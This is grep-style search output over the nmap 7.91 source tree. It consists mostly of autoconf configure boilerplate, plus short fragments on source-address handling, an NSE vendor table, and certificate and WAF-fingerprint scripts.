nmap-7.91+dfsg1/nbase/configure-760-  case $ac_option in
nmap-7.91+dfsg1/nbase/configure:761:  *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;;
nmap-7.91+dfsg1/nbase/configure-762-  *=)   ac_optarg= ;;
##############################################
nmap-7.91+dfsg1/nbase/configure-804-  -disable-* | --disable-*)
nmap-7.91+dfsg1/nbase/configure:805:    ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'`
nmap-7.91+dfsg1/nbase/configure-806-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nbase/configure-809-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nbase/configure:810:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nbase/configure-811-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nbase/configure-830-  -enable-* | --enable-*)
nmap-7.91+dfsg1/nbase/configure:831:    ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'`
nmap-7.91+dfsg1/nbase/configure-832-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nbase/configure-835-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nbase/configure:836:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nbase/configure-837-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nbase/configure-1043-  -with-* | --with-*)
nmap-7.91+dfsg1/nbase/configure:1044:    ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'`
nmap-7.91+dfsg1/nbase/configure-1045-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nbase/configure-1048-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nbase/configure:1049:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nbase/configure-1050-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nbase/configure-1059-  -without-* | --without-*)
nmap-7.91+dfsg1/nbase/configure:1060:    ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'`
nmap-7.91+dfsg1/nbase/configure-1061-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nbase/configure-1064-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nbase/configure:1065:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nbase/configure-1066-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nbase/configure-1097-  *=*)
nmap-7.91+dfsg1/nbase/configure:1098:    ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='`
nmap-7.91+dfsg1/nbase/configure-1099-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nbase/configure-1118-if test -n "$ac_prev"; then
nmap-7.91+dfsg1/nbase/configure:1119:  ac_option=--`echo $ac_prev | sed 's/_/-/g'`
nmap-7.91+dfsg1/nbase/configure-1120-  as_fn_error $? "missing argument to $ac_option"
##############################################
nmap-7.91+dfsg1/nbase/configure-1140-    */ )
nmap-7.91+dfsg1/nbase/configure:1141:      ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'`
nmap-7.91+dfsg1/nbase/configure-1142-      eval $ac_var=\$ac_val;;
##############################################
nmap-7.91+dfsg1/nbase/configure-1175-ac_ls_di=`ls -di .` &&
nmap-7.91+dfsg1/nbase/configure:1176:ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` ||
nmap-7.91+dfsg1/nbase/configure-1177-  as_fn_error $? "working directory cannot be determined"
##############################################
nmap-7.91+dfsg1/nbase/configure-1231-case $srcdir in
nmap-7.91+dfsg1/nbase/configure:1232:*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;;
nmap-7.91+dfsg1/nbase/configure-1233-esac
##############################################
nmap-7.91+dfsg1/nbase/configure-1274-By default, \`make install' will install all the files in
nmap-7.91+dfsg1/nbase/configure:1275:\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc.  You can specify
nmap-7.91+dfsg1/nbase/configure:1276:an installation prefix other than \`$ac_default_prefix' using \`--prefix',
nmap-7.91+dfsg1/nbase/configure-1277-for instance \`--prefix=\$HOME'.
##############################################
nmap-7.91+dfsg1/nbase/configure-1357-*)
nmap-7.91+dfsg1/nbase/configure:1358:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/nbase/configure-1359-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/nbase/configure:1360:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/nbase/configure-1361-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/nbase/configure-1971-    *\'*)
nmap-7.91+dfsg1/nbase/configure:1972:      ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nbase/configure-1973-    esac
##############################################
nmap-7.91+dfsg1/nbase/configure-2054-      case $ac_val in
nmap-7.91+dfsg1/nbase/configure:2055:      *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/nbase/configure-2056-      esac
##############################################
nmap-7.91+dfsg1/nbase/configure-2069-	case $ac_val in
nmap-7.91+dfsg1/nbase/configure:2070:	*\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/nbase/configure-2071-	esac
##############################################
nmap-7.91+dfsg1/nbase/configure-2189-    set,)
nmap-7.91+dfsg1/nbase/configure:2190:      { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5
nmap-7.91+dfsg1/nbase/configure:2191:$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;}
nmap-7.91+dfsg1/nbase/configure-2192-      ac_cache_corrupted=: ;;
##############################################
nmap-7.91+dfsg1/nbase/configure-2200-	# differences in whitespace do not lead to failure.
nmap-7.91+dfsg1/nbase/configure:2201:	ac_old_val_w=`echo x $ac_old_val`
nmap-7.91+dfsg1/nbase/configure:2202:	ac_new_val_w=`echo x $ac_new_val`
nmap-7.91+dfsg1/nbase/configure-2203-	if test "$ac_old_val_w" != "$ac_new_val_w"; then
##############################################
nmap-7.91+dfsg1/nbase/configure-2220-    case $ac_new_val in
nmap-7.91+dfsg1/nbase/configure:2221:    *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nbase/configure-2222-    *) ac_arg=$ac_var=$ac_new_val ;;
##############################################
nmap-7.91+dfsg1/nbase/configure-2623-$as_echo_n "checking whether the C compiler works... " >&6; }
nmap-7.91+dfsg1/nbase/configure:2624:ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'`
nmap-7.91+dfsg1/nbase/configure-2625-
##############################################
nmap-7.91+dfsg1/nbase/configure-2667-	then :; else
nmap-7.91+dfsg1/nbase/configure:2668:	   ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/nbase/configure-2669-	fi
##############################################
nmap-7.91+dfsg1/nbase/configure-2727-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;;
nmap-7.91+dfsg1/nbase/configure:2728:    *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/nbase/configure-2729-	  break;;
##############################################
nmap-7.91+dfsg1/nbase/configure-2836-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;;
nmap-7.91+dfsg1/nbase/configure:2837:    *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'`
nmap-7.91+dfsg1/nbase/configure-2838-       break;;
##############################################
nmap-7.91+dfsg1/nbase/configure-3203-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/nbase/configure:3204:  ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"`
nmap-7.91+dfsg1/nbase/configure-3205-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/nbase/configure-3206-  as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5
nmap-7.91+dfsg1/nbase/configure:3207:ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` ||
nmap-7.91+dfsg1/nbase/configure-3208-  as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/nbase/configure-3227-IFS=$ac_save_IFS
nmap-7.91+dfsg1/nbase/configure:3228:case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/nbase/configure-3229-
##############################################
nmap-7.91+dfsg1/nbase/configure-3238-else
nmap-7.91+dfsg1/nbase/configure:3239:  ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` ||
nmap-7.91+dfsg1/nbase/configure-3240-    as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/nbase/configure-3260-IFS=$ac_save_IFS
nmap-7.91+dfsg1/nbase/configure:3261:case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/nbase/configure-3262-
##############################################
nmap-7.91+dfsg1/nbase/configure-3474-  # Check for GNU $ac_path_GREP
nmap-7.91+dfsg1/nbase/configure:3475:case `"$ac_path_GREP" --version 2>&1` in
nmap-7.91+dfsg1/nbase/configure-3476-*GNU*)
##############################################
nmap-7.91+dfsg1/nbase/configure-3540-  # Check for GNU $ac_path_EGREP
nmap-7.91+dfsg1/nbase/configure:3541:case `"$ac_path_EGREP" --version 2>&1` in
nmap-7.91+dfsg1/nbase/configure-3542-*GNU*)
##############################################
nmap-7.91+dfsg1/nbase/configure-3701-do :
nmap-7.91+dfsg1/nbase/configure:3702:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-3703-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default
##############################################
nmap-7.91+dfsg1/nbase/configure-3706-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:3707:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-3708-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-3716-do :
nmap-7.91+dfsg1/nbase/configure:3717:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-3718-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/nbase/configure-3720-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:3721:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-3722-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-4209-do :
nmap-7.91+dfsg1/nbase/configure:4210:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-4211-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/nbase/configure-4213-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:4214:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-4215-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-4223-do :
nmap-7.91+dfsg1/nbase/configure:4224:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-4225-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/nbase/configure-4227-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:4228:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-4229-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-4246-do :
nmap-7.91+dfsg1/nbase/configure:4247:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-4248-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/nbase/configure-4250-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:4251:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-4252-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-4259-do :
nmap-7.91+dfsg1/nbase/configure:4260:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-4261-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/nbase/configure-4263-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:4264:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-4265-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-4291-do :
nmap-7.91+dfsg1/nbase/configure:4292:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-4293-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/nbase/configure-4295-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:4296:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-4297-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-4650-do :
nmap-7.91+dfsg1/nbase/configure:4651:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/nbase/configure-4652-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/nbase/configure-4654-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nbase/configure:4655:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nbase/configure-4656-_ACEOF
##############################################
nmap-7.91+dfsg1/nbase/configure-4748-#endif
nmap-7.91+dfsg1/nbase/configure:4749:char inet_addr ();
nmap-7.91+dfsg1/nbase/configure-4750-int
##############################################
nmap-7.91+dfsg1/nbase/configure-4752-{
nmap-7.91+dfsg1/nbase/configure:4753:return inet_addr ();
nmap-7.91+dfsg1/nbase/configure-4754-  ;
##############################################
nmap-7.91+dfsg1/nbase/configure-4830-    sa.sin_port = 0;
nmap-7.91+dfsg1/nbase/configure:4831:    sa.sin_addr.s_addr = inet_addr("127.0.0.1");
nmap-7.91+dfsg1/nbase/configure-4832-#ifdef SIN6_LEN
##############################################
nmap-7.91+dfsg1/nbase/configure-5398-  ac_script='s/\$U\././;s/\.o$//;s/\.obj$//'
nmap-7.91+dfsg1/nbase/configure:5399:  ac_i=`$as_echo "$ac_i" | sed "$ac_script"`
nmap-7.91+dfsg1/nbase/configure-5400-  # 2. Prepend LIBOBJDIR.  When used with automake>=1.10 LIBOBJDIR
##############################################
nmap-7.91+dfsg1/nbase/configure-5466-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/nbase/configure:5467:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nbase/configure-5468-  as_echo='print -r --'
nmap-7.91+dfsg1/nbase/configure-5469-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/nbase/configure:5470:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nbase/configure-5471-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/nbase/configure-5473-else
nmap-7.91+dfsg1/nbase/configure:5474:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/nbase/configure-5475-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/nbase/configure-5483-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/nbase/configure:5484:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/nbase/configure-5485-      esac;
##############################################
nmap-7.91+dfsg1/nbase/configure-5560-# ----------------------------------------
nmap-7.91+dfsg1/nbase/configure:5561:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/nbase/configure-5562-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/nbase/configure-5632-  {
nmap-7.91+dfsg1/nbase/configure:5633:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/nbase/configure-5634-  }
##############################################
nmap-7.91+dfsg1/nbase/configure-5736-      case $as_dir in #(
nmap-7.91+dfsg1/nbase/configure:5737:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/nbase/configure-5738-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/nbase/configure-5867-cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1
nmap-7.91+dfsg1/nbase/configure:5868:ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
nmap-7.91+dfsg1/nbase/configure-5869-ac_cs_version="\\
##############################################
nmap-7.91+dfsg1/nbase/configure-5889-  --*=?*)
nmap-7.91+dfsg1/nbase/configure:5890:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/nbase/configure:5891:    ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'`
nmap-7.91+dfsg1/nbase/configure-5892-    ac_shift=:
##############################################
nmap-7.91+dfsg1/nbase/configure-5894-  --*=)
nmap-7.91+dfsg1/nbase/configure:5895:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/nbase/configure-5896-    ac_optarg=
##############################################
nmap-7.91+dfsg1/nbase/configure-5918-    case $ac_optarg in
nmap-7.91+dfsg1/nbase/configure:5919:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nbase/configure-5920-    '') as_fn_error $? "missing file argument" ;;
##############################################
nmap-7.91+dfsg1/nbase/configure-5926-    case $ac_optarg in
nmap-7.91+dfsg1/nbase/configure:5927:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nbase/configure-5928-    esac
##############################################
nmap-7.91+dfsg1/nbase/configure-6047-fi
nmap-7.91+dfsg1/nbase/configure:6048:ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' </dev/null 2>/dev/null`
nmap-7.91+dfsg1/nbase/configure-6049-if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then
##############################################
nmap-7.91+dfsg1/nbase/configure-6064-  as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5
nmap-7.91+dfsg1/nbase/configure:6065:ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'`
nmap-7.91+dfsg1/nbase/configure-6066-ac_delim='%!_!# '
##############################################
nmap-7.91+dfsg1/nbase/configure-6070-
nmap-7.91+dfsg1/nbase/configure:6071:  ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X`
nmap-7.91+dfsg1/nbase/configure-6072-  if test $ac_delim_n = $ac_delim_num; then
##############################################
nmap-7.91+dfsg1/nbase/configure-6208-for ac_last_try in false false :; do
nmap-7.91+dfsg1/nbase/configure:6209:  ac_tt=`sed -n "/$ac_delim/p" confdefs.h`
nmap-7.91+dfsg1/nbase/configure-6210-  if test -z "$ac_tt"; then
##############################################
nmap-7.91+dfsg1/nbase/configure-6340-      esac
nmap-7.91+dfsg1/nbase/configure:6341:      case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac
nmap-7.91+dfsg1/nbase/configure-6342-      as_fn_append ac_file_inputs " '$ac_f'"
##############################################
nmap-7.91+dfsg1/nbase/configure-6399-*)
nmap-7.91+dfsg1/nbase/configure:6400:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/nbase/configure-6401-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/nbase/configure:6402:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/nbase/configure-6403-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/nbase/configure-6451-/@mandir@/p'
nmap-7.91+dfsg1/nbase/configure:6452:case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in
nmap-7.91+dfsg1/nbase/configure-6453-*datarootdir*) ac_datarootdir_seen=yes;;
##############################################
nmap-7.91+dfsg1/nbase/configure-6468-
nmap-7.91+dfsg1/nbase/configure:6469:# Neutralize VPATH when `$srcdir' = `.'.
nmap-7.91+dfsg1/nbase/configure-6470-# Shell code in configure.ac might set extrasub.
##############################################
nmap-7.91+dfsg1/nbase/configure-6494-test -z "$ac_datarootdir_hack$ac_datarootdir_seen" &&
nmap-7.91+dfsg1/nbase/configure:6495:  { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } &&
nmap-7.91+dfsg1/nbase/configure-6496-  { ac_out=`sed -n '/^[	 ]*datarootdir[	 ]*:*=/p' \
##############################################
nmap-7.91+dfsg1/nmap.cc-1414-    }
nmap-7.91+dfsg1/nmap.cc:1415:    o.setSourceSockAddr(&ss, sslen);
nmap-7.91+dfsg1/nmap.cc-1416-  }
##############################################
nmap-7.91+dfsg1/nmap.cc-1662-   * --We are doing a raw sock scan and NOT pinging anyone */
nmap-7.91+dfsg1/nmap.cc:1663:  if (o.SourceSockAddr() && !*o.device) {
nmap-7.91+dfsg1/nmap.cc:1664:    if (ipaddr2devname(o.device, o.SourceSockAddr()) != 0) {
nmap-7.91+dfsg1/nmap.cc-1665-      fatal("Could not figure out what device to send the packet out on with the source address you gave me!  If you are trying to sp00f your scan, this is normal, just give the -e eth0 or -e ppp0 or whatever.  Otherwise you can still use -e, but I find it kind of fishy.");
##############################################
nmap-7.91+dfsg1/nmap.cc-1668-
nmap-7.91+dfsg1/nmap.cc:1669:  if (*o.device && !o.SourceSockAddr()) {
nmap-7.91+dfsg1/nmap.cc-1670-    struct sockaddr_storage tmpsock;
nmap-7.91+dfsg1/nmap.cc-1671-    memset(&tmpsock, 0, sizeof(tmpsock));
nmap-7.91+dfsg1/nmap.cc:1672:    if (devname2ipaddr(o.device, &tmpsock) == -1) {
nmap-7.91+dfsg1/nmap.cc-1673-      fatal("I cannot figure out what source address to use for device %s, does it even exist?", o.device);
nmap-7.91+dfsg1/nmap.cc-1674-    }
nmap-7.91+dfsg1/nmap.cc:1675:    o.setSourceSockAddr(&tmpsock, sizeof(tmpsock));
nmap-7.91+dfsg1/nmap.cc-1676-  }
##############################################
nmap-7.91+dfsg1/nmap.cc-1852-
nmap-7.91+dfsg1/nmap.cc:1853:    if (!route_dst(&ss, &rnfo, o.device, o.SourceSockAddr())) {
nmap-7.91+dfsg1/nmap.cc-1854-      printf("Can't route %s (%s).", dst, inet_ntop_ez(&ss, sslen));
##############################################
nmap-7.91+dfsg1/nmap.cc-2072-      if (o.spoofsource) {
nmap-7.91+dfsg1/nmap.cc:2073:        o.SourceSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/nmap.cc:2074:        currenths->setSourceSockAddr(&ss, sslen);
nmap-7.91+dfsg1/nmap.cc-2075-      }
##############################################
nmap-7.91+dfsg1/nmap.cc-2095-      if (o.RawScan()) {
nmap-7.91+dfsg1/nmap.cc:2096:        if (currenths->SourceSockAddr(NULL, NULL) != 0) {
nmap-7.91+dfsg1/nmap.cc:2097:          if (o.SourceSockAddr(&ss, &sslen) == 0) {
nmap-7.91+dfsg1/nmap.cc:2098:            currenths->setSourceSockAddr(&ss, sslen);
nmap-7.91+dfsg1/nmap.cc-2099-          } else {
##############################################
nmap-7.91+dfsg1/nmap.cc-2103-
nmap-7.91+dfsg1/nmap.cc:2104:            o.setSourceSockAddr(&ss, sslen);
nmap-7.91+dfsg1/nmap.cc:2105:            currenths->setSourceSockAddr(&ss, sslen);
nmap-7.91+dfsg1/nmap.cc-2106-            if (! sourceaddrwarning) {
##############################################
nmap-7.91+dfsg1/nse_nsock.cc-415-      if (nu->source_addr.ss_family != AF_UNSPEC) {
nmap-7.91+dfsg1/nse_nsock.cc:416:        nsock_iod_set_localaddr(nu->nsiod, &nu->source_addr, nu->source_addrlen);
nmap-7.91+dfsg1/nse_nsock.cc-417-      } else if (o.spoofsource) {
##############################################
nmap-7.91+dfsg1/nse_nsock.cc-419-        size_t sslen;
nmap-7.91+dfsg1/nse_nsock.cc:420:        o.SourceSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/nse_nsock.cc:421:        nsock_iod_set_localaddr(nu->nsiod, &ss, sslen);
nmap-7.91+dfsg1/nse_nsock.cc-422-      }
##############################################
nmap-7.91+dfsg1/nse_nsock.cc-531-  if (nu->source_addr.ss_family != AF_UNSPEC) {
nmap-7.91+dfsg1/nse_nsock.cc:532:    nsock_iod_set_localaddr(nu->nsiod, &nu->source_addr, nu->source_addrlen);
nmap-7.91+dfsg1/nse_nsock.cc-533-  } else if (o.spoofsource) {
##############################################
nmap-7.91+dfsg1/nse_nsock.cc-536-
nmap-7.91+dfsg1/nse_nsock.cc:537:    o.SourceSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/nse_nsock.cc:538:    nsock_iod_set_localaddr(nu->nsiod, &ss, sslen);
nmap-7.91+dfsg1/nse_nsock.cc-539-  }
##############################################
nmap-7.91+dfsg1/service_scan.cc-2070-        if (o.spoofsource) {
nmap-7.91+dfsg1/service_scan.cc:2071:          o.SourceSockAddr(&ss, &ss_len);
nmap-7.91+dfsg1/service_scan.cc:2072:          nsock_iod_set_localaddr(svc->niod, &ss, ss_len);
nmap-7.91+dfsg1/service_scan.cc-2073-        }
##############################################
nmap-7.91+dfsg1/service_scan.cc-2080-        }
nmap-7.91+dfsg1/service_scan.cc:2081:        svc->target->TargetSockAddr(&ss, &ss_len);
nmap-7.91+dfsg1/service_scan.cc-2082-        if (svc->tunnel == SERVICE_TUNNEL_NONE) {
##############################################
nmap-7.91+dfsg1/service_scan.cc-2285-    if (o.spoofsource) {
nmap-7.91+dfsg1/service_scan.cc:2286:      o.SourceSockAddr(&ss, &ss_len);
nmap-7.91+dfsg1/service_scan.cc:2287:      nsock_iod_set_localaddr(svc->niod, &ss, ss_len);
nmap-7.91+dfsg1/service_scan.cc-2288-    }
##############################################
nmap-7.91+dfsg1/service_scan.cc-2290-      nsock_iod_set_ipoptions(svc->niod, o.ipoptions, o.ipoptionslen);
nmap-7.91+dfsg1/service_scan.cc:2291:    svc->target->TargetSockAddr(&ss, &ss_len);
nmap-7.91+dfsg1/service_scan.cc-2292-    if (svc->proto == IPPROTO_TCP)
##############################################
nmap-7.91+dfsg1/portreasons.h-100-
nmap-7.91+dfsg1/portreasons.h:101:        int set_ip_addr(const struct sockaddr_storage *ss);
nmap-7.91+dfsg1/portreasons.h-102-} state_reason_t;
##############################################
nmap-7.91+dfsg1/scripts/enip-info.nse-282-	[213] = "Reserved",
nmap-7.91+dfsg1/scripts/enip-info.nse:283:	[214] = "ASM Japan K.K.",
nmap-7.91+dfsg1/scripts/enip-info.nse-284-	[215] = "HIRATA Corp.",
##############################################
nmap-7.91+dfsg1/scripts/ssl-cert-intaddr.nse-93-      stdnse.debug2("search %s %s", certFieldName, k)
nmap-7.91+dfsg1/scripts/ssl-cert-intaddr.nse:94:      leaks[certFieldName.." "..k] = extractPrivateIPv4Addr(v)
nmap-7.91+dfsg1/scripts/ssl-cert-intaddr.nse-95-    end
##############################################
nmap-7.91+dfsg1/scripts/ssl-cert-intaddr.nse-113-      stdnse.debug2("search ext %s", ext.name)
nmap-7.91+dfsg1/scripts/ssl-cert-intaddr.nse:114:      leaks[ext.name] = extractPrivateIPv4Addr(ext.value)
nmap-7.91+dfsg1/scripts/ssl-cert-intaddr.nse-115-    else
##############################################
nmap-7.91+dfsg1/scripts/http-waf-fingerprint.nse-92-        if string.match(cookie.name, 'TS%w+') and string.len(cookie.name) <= 8 then
nmap-7.91+dfsg1/scripts/http-waf-fingerprint.nse:93:          stdnse.debug1("F5 ASM detected through cookies.")
